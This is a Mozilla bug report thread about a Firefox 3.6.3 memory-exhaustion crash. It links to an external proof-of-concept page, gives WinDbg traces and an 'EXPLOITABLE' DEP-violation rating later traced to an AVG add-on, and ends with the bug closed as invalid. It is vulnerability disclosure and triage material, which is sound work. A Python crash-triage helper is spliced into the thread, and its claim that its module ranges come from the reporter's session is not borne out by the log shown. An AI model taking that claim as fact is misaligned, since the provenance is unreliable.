Closed
Bug 569953
Opened 14 years ago
Closed 4 years ago
Denial of Service upon viewing a malicious website (possible remote code execution) xul!nsPersistentProperties::Load
Categories
(Firefox :: General, defect)
RESOLVED
INVALID
People
(Reporter: obarrera, Unassigned)
Details
(Keywords: crash, sec-vector, testcase, Whiteboard: [sg:vector-critical? (AVG)][sg:dos oom otherwise])
Attachments (1 file, 1 obsolete file)
8.37 KB, application/java-archive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)

If a user visits a malicious website with the following code (PoC) a DoS will occur resulting in memory corruption and possible remote code execution.

Reproducible: Always

Steps to Reproduce:
1. Visit a malicious website http://cybermediaplanet.com/security/ff3.6.3/FF3.6.3-PoC-v2.0.html
2. Run the PoC.
3. Wait for the crash and then debug, rinse and repeat.

Actual Results:
Crash.

Expected Results:
Not Crash.

I reported the issue to ZDI about a month ago and they determined this is likely not an exploitable vulnerability; however, I still feel it is an issue which should be addressed. If you take a look at the stack trace there is memory corruption; now, whether it can be leveraged as an exploit is the question. Either way ZDI had well over a month to pursue/report the issue to the vendor and decided not to, so I decided to notify Mozilla and post the PoC in order to get further feedback on the issue.

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.
ModLoad: 6bc50000 6bca0000 C:\Program Files (x86)\AVG\AVG9\avglogx.dll
ModLoad: 6db90000 6dca1000 C:\Program Files (x86)\AVG\AVG9\avgxpl.dll
ModLoad: 06800000 068e5000 C:\Program Files (x86)\AVG\AVG9\avglvex.dll
ModLoad: 6a920000 6aa08000 C:\Program Files (x86)\AVG\AVG9\avgcfgx.dll
ModLoad: 6aa70000 6aad7000 C:\Program Files (x86)\AVG\AVG9\avgclitx.dll
ModLoad: 6a920000 6aa08000 C:\Program Files (x86)\AVG\AVG9\avgcfgx.dll
ModLoad: 6aa70000 6aad7000 C:\Program Files (x86)\AVG\AVG9\avgclitx.dll
ModLoad: 6a920000 6aa08000 C:\Program Files (x86)\AVG\AVG9\avgcfgx.dll
ModLoad: 6aa70000 6aad7000 C:\Program Files (x86)\AVG\AVG9\avgclitx.dll
ModLoad: 6bbd0000 6bc1f000 C:\Program Files (x86)\AVG\AVG9\avglngx.dll
ModLoad: 73b80000 73b85000 C:\Windows\SysWOW64\wship6.dll
ModLoad: 749c0000 749c6000 C:\Windows\SysWOW64\rasadhlp.dll
(130c.1aac): C++ EH exception - code e06d7363 (first chance)
(130c.1aac): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f820 edi=00002000
eip=75d8e124 esp=002cded0 ebp=002cdf20 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
kernel32!RaiseException+0x58:
75d8e124 c9              leave
0:000> gu
WARNING: Continuing a non-continuable exception
eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f820 edi=00002000
eip=711ec54b esp=002cdf38 ebp=002cdf58 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
MOZCRT19!_CxxThrowException+0x46:
711ec54b c9              leave
0:000> gu
eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f820 edi=00002000
eip=711f4f33 esp=002cdf68 ebp=002cdf94 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
MOZCRT19!operator new+0x73:
711f4f33 83c40c          add     esp,0Ch
0:000> gu
eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f820 edi=00002000
eip=64a36dff esp=002cdf78 ebp=002cdf94 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
xul!ByteBufferImpl::Init+0x1f:
64a36dff 894608          mov     dword ptr [esi+8],eax ds:002b:4bf7f828=00000000
0:000> gu
eax=00000000 ebx=4bf7f6e0 ecx=00002000 edx=00000000 esi=4bf7f6ec edi=00002000
eip=64a36eec esp=002cdf8c ebp=002cdf94 iopl=0         nv up ei pl zr ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000257
xul!NS_NewByteBuffer+0x25:
64a36eec 8bf8            mov     edi,eax
0:000> gu
eax=00000000 ebx=4bf7f6e0 ecx=4bf7f6ec edx=00000000 esi=4bf7f6ec edi=00002000
eip=64bc77c3 esp=002cdf9c ebp=002cdfc4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
xul!UTF8InputStream::Init+0x1f:
64bc77c3 85c0            test    eax,eax
0:000> gu
(130c.1aac): C++ EH exception - code e06d7363 (first chance)
(130c.1aac): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f840 edi=00002000
eip=75d8e124 esp=002cded0 ebp=002cdf20 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
kernel32!RaiseException+0x58:
75d8e124 c9              leave
0:000> gu
WARNING: Continuing a non-continuable exception
eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f840 edi=00002000
eip=711ec54b esp=002cdf38 ebp=002cdf58 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
MOZCRT19!_CxxThrowException+0x46:
711ec54b c9              leave
0:000> gu
eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f840 edi=00002000
eip=711f4f33 esp=002cdf68 ebp=002cdf94 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
MOZCRT19!operator new+0x73:
711f4f33 83c40c          add     esp,0Ch
0:000> gu
eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f840 edi=00002000
eip=64a36cf0 esp=002cdf78 ebp=002cdf94 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
xul!UnicharBufferImpl::Init+0x2d:
64a36cf0 894608          mov     dword ptr [esi+8],eax ds:002b:4bf7f848=00000000
0:000> gu
eax=00000000 ebx=4bf7f6e0 ecx=00004000 edx=00000000 esi=4bf7f6ec edi=00002000
eip=64a36dc9 esp=002cdf8c ebp=002cdf94 iopl=0         nv up ei pl zr ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000257
xul!NS_NewUnicharBuffer+0x1e:
64a36dc9 8bf8            mov     edi,eax
0:000> gu
eax=00000000 ebx=4bf7f6e0 ecx=4bf7f6f0 edx=00000000 esi=4bf7f6ec edi=00002000
eip=64bc77dd esp=002cdf9c ebp=002cdfc4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
xul!UTF8InputStream::Init+0x39:
64bc77dd 85c0            test    eax,eax
0:000> gu
eax=00000000 ebx=11d77978 ecx=4bf7f6e8 edx=47fe4440 esi=4bf7f6e0 edi=11d77978
eip=64a4b21b esp=002cdfbc ebp=002cdfc4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
xul!nsSimpleUnicharStreamFactory::CreateInstanceFromUTF8Stream+0x3a:
64a4b21b 85c0            test    eax,eax
0:000> gu
eax=00000000 ebx=11d77978 ecx=4bf7f6e8 edx=47fe4440 esi=11d77970 edi=00000000
eip=64a4b283 esp=002cdfd8 ebp=002ce1d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
xul!nsPersistentProperties::Load+0x46:
64a4b283 85c0            test    eax,eax
0:000> gu
(130c.1aac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=69726353 ebx=002cdf7c ecx=00000000 edx=00000002 esi=6c476469 edi=6c61626f
eip=20646962 esp=002cdf14 ebp=726f463d iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
20646962 cc              int     3
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\AVG\AVG9\Firefox\components\avgssff.dll -
0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x20646962
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Data Execution Protection (DEP) Violation
Exception Hash (Major/Minor): 0x264d5172.0x1d4a643b
Stack Trace:
Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown
avgssff!NSGetModule+0x5b74a
xul!__dyn_tls_init_callback <PERF> (xul+0xb3776f)+0x0
Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown
avgssff!NSGetModule+0x59760
Unknown Unknown Unknown Unknown Unknown
xpcom!__dyn_tls_init_callback <PERF> (xpcom+0x6972)+0x0
msvcrt!_wstat32i64+0xdd
Unknown Unknown Unknown Unknown Unknown Unknown Unknown
xul!__dyn_tls_init_callback <PERF> (xul+0xb12064)+0x0
Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown
Instruction Address: 0x0000000020646962
Description: Data Execution Prevention Violation
Short Description: DEPViolation
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000020646962 called from avgssff!NSGetModule+0x000000000005b74a (Hash=0x264d5172.0x1d4a643b)
User mode DEP access violations are exploitable.
Comment 1•14 years ago
Comment 2•14 years ago
I can confirm the DoS aspect at least, crashes from resource exhaustion on my Mac -- the usual throw from operator new. That's a safe crash and nothing to worry about. Will try on Windows next -- the report of a DEP violation is clearly bad. However, I notice that AVG was on the stack and we've had trouble with their add-ons in the past. See http://www.mozilla.com/en-US/blocklist/ for example. Could you try this again in safe-mode or at least with AVG's add-on disabled? It's possible you're finding an exploitable bug in AVG rather than Firefox.
Attachment #449761 - Attachment is obsolete: true
Updated•14 years ago
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•14 years ago
Reporter
Comment 3•14 years ago
I tried to run the PoC with the AVG add-on turned off and with Firefox in safe mode, but was not able to reproduce a DEP violation. I kind of figured it was an issue with AVG because the DEP violation always occurs around the same address in memory, eip=20646962, which I think is an AVG dll. At least you guys have more insight than the people at ZDI. The response of "I think there is an issue" just didn't sound right to me. So, if the AVG Safe Search 9.0.0.825 add-on is installed while running FF 3.6.3 on Vista, I am able to overwrite a memory location which is jmp'ed to by the AVG dll C:\Program Files (x86)\AVG\AVG9\Firefox\components\avgssff.dll. Yeah, I still think this might be an issue. Now, I guess the next step would be to try to notify AVG and verify the issue?
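A small crash-triage helper, added here as an example and not part of the report or of any Mozilla or AVG tooling: it parses WinDbg register lines like the two in the transcript above and checks whether eip falls inside a loaded module (the kernel32!RaiseException frame reached from the failed operator new, the resource-exhaustion crash Comment 2 calls safe) or instead lies in no module and decodes as printable text, as 0x20646962 does (little-endian bytes 62 69 64 20, "bid "), with eax, esi, edi and ebp holding text fragments too, a sign that string bytes rather than a code address reached the instruction pointer. The module table is a constructed subset using ranges from the reporter's debugger session.

```python
"""Triage WinDbg register lines: failed-allocation path vs. text in eip."""
import re

# Register lines copied from the reporter's transcript: the first is the
# operator-new failure (kernel32!RaiseException), the second the DEP violation.
OOM_LINE = ("eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f820 "
            "edi=00002000 eip=75d8e124 esp=002cded0 ebp=002cdf20 iopl=0")
DEP_LINE = ("eax=69726353 ebx=002cdf7c ecx=00000000 edx=00000002 esi=6c476469 "
            "edi=6c61626f eip=20646962 esp=002cdf14 ebp=726f463d iopl=0")

# (name, start, end) as reported by ModLoad in the same session; a constructed
# subset that is enough to place both faulting eip values.
MODULES = [
    ("kernel32.dll", 0x75D70000, 0x75E80000),
    ("MOZCRT19.dll", 0x711C0000, 0x71270000),
    ("xul.dll", 0x64A10000, 0x6554C000),
    ("avgssff.dll", 0x6C660000, 0x6C7B1000),
]

# Only the 32-bit general registers; iopl=, efl= and flag tokens are skipped.
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bsi]p)=([0-9a-fA-F]{8})\b")


def parse_registers(line):
    """Return {name: int} for every general register found in the line."""
    return {name: int(val, 16) for name, val in REG_RE.findall(line)}


def as_ascii(value):
    """Decode a 32-bit value as the 4 little-endian bytes it occupies in
    memory; return the text if all four are printable ASCII, else None."""
    raw = value.to_bytes(4, "little")
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def module_for(addr, modules=MODULES):
    """Name of the loaded module whose range contains addr, or None."""
    for name, start, end in modules:
        if start <= addr < end:
            return name
    return None


def classify(line, modules=MODULES):
    """Classify one register line.

    Returns (verdict, module, ascii_regs):
      verdict    'code-address' when eip lies inside a loaded module,
                 'eip-is-data'  when it lies in none and decodes as text,
                 'eip-unmapped' otherwise;
      module     the module containing eip, or None;
      ascii_regs {register: text} for every register that decodes as text.
    """
    regs = parse_registers(line)
    if "eip" not in regs:
        raise ValueError("no eip in register line")
    ascii_regs = {}
    for name, value in regs.items():
        text = as_ascii(value)
        if text is not None:
            ascii_regs[name] = text
    module = module_for(regs["eip"], modules)
    if module is not None:
        verdict = "code-address"
    elif "eip" in ascii_regs:
        verdict = "eip-is-data"
    else:
        verdict = "eip-unmapped"
    return verdict, module, ascii_regs


if __name__ == "__main__":
    for label, line in (("OOM_LINE", OOM_LINE), ("DEP_LINE", DEP_LINE)):
        verdict, module, ascii_regs = classify(line)
        print(f"{label}: {verdict} module={module} text={ascii_regs}")
```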
Comment 5•14 years ago
ZDI may not have tested with AVG installed so you could check that with them, but if they're still not interested talk to AVG.
Updated•14 years ago
Whiteboard: [sg:vector-critical? (AVG)] → [sg:vector-critical? (AVG)][sg:dos oom otherwise]
Reporter
Comment 6•14 years ago
Yeah, I get that; it is limited by the fact that it would depend on an AVG add-on if the issue were to be exploited. I may bring the issue back to ZDI's attention; however, it is not really an issue with Firefox, but rather a third-party application. Thanks for taking the time to look over the issue; either way I learned from my experience.
Updated•12 years ago
Keywords: sec-vector
Comment 7•4 years ago
POC is gone, not enough info to pursue.
Status: NEW → RESOLVED
Closed: 4 years ago
Resolution: --- → INVALID